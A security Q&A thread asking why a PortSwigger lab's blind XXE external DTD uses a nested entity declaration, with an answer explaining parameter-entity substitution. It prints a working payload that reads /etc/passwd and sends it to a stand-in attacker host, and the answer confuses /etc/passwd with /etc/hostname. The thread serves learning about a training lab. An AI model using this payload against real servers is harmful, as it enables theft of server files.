# What's the use of an "extra" dynamic declaration in an external DTD blind XXE attack?

Tags: web-application, burp-suite, xml, xxe

I've been studying XXE attacks through [Portswigger's Web Security Academy](https://portswigger.net/web-security/xxe/blind). I stumbled upon a lab [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration).

In this lab an attacker has to define an entity within XML request to request an external DTD containing exploit.

The content of exploit.dtd should be as following. [Solution is publicly available on WSA.]

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```

I don't understand the extra step of a dynamic declaration (i.e. `<!ENTITY % eval...`) in the above external DTD. Why not simply skip this dynamic declaration and instead write?

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>
%exfiltrate;
```

Any ideas?

Comment: Did you get the answer for this ?

Comment: @SaiRamReddy - Nope :(

Comment: I also stumbled upon same idea while solving WSA labs. That's what brought me here looking for answers. I have read may writeup of XXE OOB data exfiltration and all of them used same technique without any explanation as to why.

Answer (score 1):

The way entities are developed, they are developed for a specific roles.

An internal entity is designed for the role of text substitution. They are treated as constants having a value. On the other hand an external entity is designed for role of requesting DTD. Mentioned resources in external entity are requested.

Examples of internal and external entity.

Internal entity:   `<!ENTITY foo "some text">`

External entity:   `<!ENTITY bar SYSTEM "URI">`

In first example,

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```

The `file` is an external entity requesting `/etc/passwd` file whereas `eval` is an internal entity with text,

`<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>`

It should be noted that this will be treated as plaintext and substitution of parameter entity `%file` will happen. Now `eval` holds the value,

`<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=hostname'>`

where 'hostname' is the content of `/etc/hostname` file.

---

However, in second example,

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>
%exfiltrate;
```

`file` and `exfiltrate` both are external entities where only requesting URI is allowed and no text substitution is allowed here.

When `%exfiltrate` expands it will consider `%file` as plaintext only and won't substitute contents of `/etc/hostname` file. Result will be request of resource at,

`http://web-attacker.com/?x=%file;`